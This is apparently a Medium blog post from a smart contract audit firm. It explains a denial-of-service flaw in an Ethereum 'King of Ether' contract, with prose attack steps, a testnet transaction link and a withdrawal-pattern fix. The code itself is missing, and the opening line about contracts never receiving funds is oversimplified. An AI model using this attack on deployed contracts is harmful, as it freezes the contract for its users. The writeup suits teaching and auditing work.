Detailed explanation of Ethereum smart contract vulnerabilities — — On-Chain Vulnerability Recurrence Denial of service(DoS)

Detailed explanation of Ethereum smart contract vulnerabilities — On-chain Vulnerability Recurrence — Denial of Service(DoS)

Welcome to follow and discuss with us

Author: support@lunaray.co

0x01 Vulnerability principle

Accounts can receive funds via <address>.call, while contracts cannot.

0x02 Vulnerable contract

The exploit is based on solidity ^0.8.10 version

The goal of KingOfEther is that the user becomes the new king by sending more ETH than the previous user, and the contract refunds the ether sent by the previous king.

0x03 Attack idea

Using <address>.call, it is impossible to send currency to the contract address, making the attack contract the new king and invalidating the vulnerable contract.

0x04 Attack contract

Next, write the attack contract:

Among them, the hacker pays the vulnerability contract through the attack function, which will cause the attack contract to become the new king, and no one can become the next new king.

0x05 Attack process

  1. Deploy KingOfEther
  2. Alice becomes king by sending 1 Ether to claimThrone().
  3. Bob becomes king by sending 2 Ether to claimThrone(). Alice receives a refund of 1 ether.
  4. Deploy the attack with the address of KingOfEther.
  5. Call attack with 3 Ether
  6. The current king is attacking the contract, and no one can become the new king.

0x06 On-chain recurrence

The vulnerability has been reproduced on the chain according to the attack process. If there are new users forcing the transaction, an error will occur:

https://kovan.etherscan.io/tx/0xb69a8e160045179565057cc366039dfb8f835eeb58ce85a6da553b5ca5c38a89

0x07 prevention techniques

  • One way to prevent this is to allow users to withdraw their ether instead of sending it.

Record the total amount of money played by the account that has become king, and let the account withdraw money through the withdrawal function to prevent this vulnerability.

--

--

--

Lunaray takes a leading position in smart contract auditing and consulting service for blockchain security.

Recommended from Medium

{UPDATE} Duck Dynasty®: Battle of the Beards Hack Free Resources Generator

Lunaray completes security audit of NirvanaMeta Smart Contract

Standard Protocol Partner Showcase — Clover Finance

New SOC Prime detection rules available in Chronicle

Public Key Infrastructure(PKI)- A small look

We Are Cyberbombing the Crap Out of Russia

The World’s First Doctorate of Business in Data Science

Announcement of LBank Launches LEAD Trading Contest to Share 3,500,000 LEAD

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
lunaray

lunaray

Lunaray takes a leading position in smart contract auditing and consulting service for blockchain security.

More from Medium

Security Implications of selfdestruct() in Solidity — Part 1

Damn Vulnerable DeFi Challenge #3 Solution — Truster

Lunaray Token Security Scan Report

Production Contract Security — Part 2